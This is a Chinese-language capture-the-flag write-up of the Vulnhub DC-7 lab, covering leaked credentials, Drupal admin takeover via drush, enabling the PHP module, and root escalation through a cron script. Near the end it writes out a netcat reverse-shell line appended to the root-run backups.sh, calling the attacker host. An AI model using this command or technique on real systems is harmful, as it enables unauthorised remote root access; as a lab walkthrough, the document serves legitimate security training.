Vulnhub靶场渗透-DC-7

前言

靶机(192.168.110.141)
攻击机(192.168.110.127)

开始

Vulnhub靶场渗透-DC-7_第1张图片
Vulnhub靶场渗透-DC-7_第2张图片
大概都看了一遍有什么,暂时没有思路
Vulnhub靶场渗透-DC-7_第3张图片
回到首页,翻译那段欢迎的文字,感觉没那么简单
Vulnhub靶场渗透-DC-7_第4张图片
尝试去GitHub上找找这个
Vulnhub靶场渗透-DC-7_第5张图片
Vulnhub靶场渗透-DC-7_第6张图片
看到这段话,之前的猜测是没错了,这是部分的源码吧
在 config.php 中发现用户密码
Vulnhub靶场渗透-DC-7_第7张图片
ssh 尝试可以连接上
Vulnhub靶场渗透-DC-7_第8张图片
可疑的脚本文件
Vulnhub靶场渗透-DC-7_第9张图片
是个定时任务
Vulnhub靶场渗透-DC-7_第10张图片
网站根目录可以执行drush命令,那就可以修改admin的密码了![在这里插入图片描述](https://img-blog.csdnimg.cn/40275cf4674d4f499ade95e8ab87a334.pn
Vulnhub靶场渗透-DC-7_第11张图片
大概内容都看了一下,最后锁定在这个编辑页
Vulnhub靶场渗透-DC-7_第12张图片
drupal为了安全,在8以后将PHP需要作为模块进行导入
Vulnhub靶场渗透-DC-7_第13张图片
Vulnhub靶场渗透-DC-7_第14张图片
导入这个进行https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
加载PHP模块进去就可以正常使用了
在这里插入图片描述
测试一下
Vulnhub靶场渗透-DC-7_第15张图片
Vulnhub靶场渗透-DC-7_第16张图片
可以成功执行PHP,很好,那就可以弹shell了
Vulnhub靶场渗透-DC-7_第17张图片
注意到 root用户 在 www-data组中,那就可以通过这个定时脚本文件来弹 root 的shell了
echo "mkfifo /tmp/fifo; nc 192.168.110.127 7777 0/tmp/fifo 2>&1; rm /tmp/fifo" >> backups.sh

然后现在要做的就是等了,开启监听7777端口等定时任务执行
Vulnhub靶场渗透-DC-7_第18张图片
Vulnhub靶场渗透-DC-7_第19张图片

你可能感兴趣的:(Vulnhub渗透靶场学习,安全)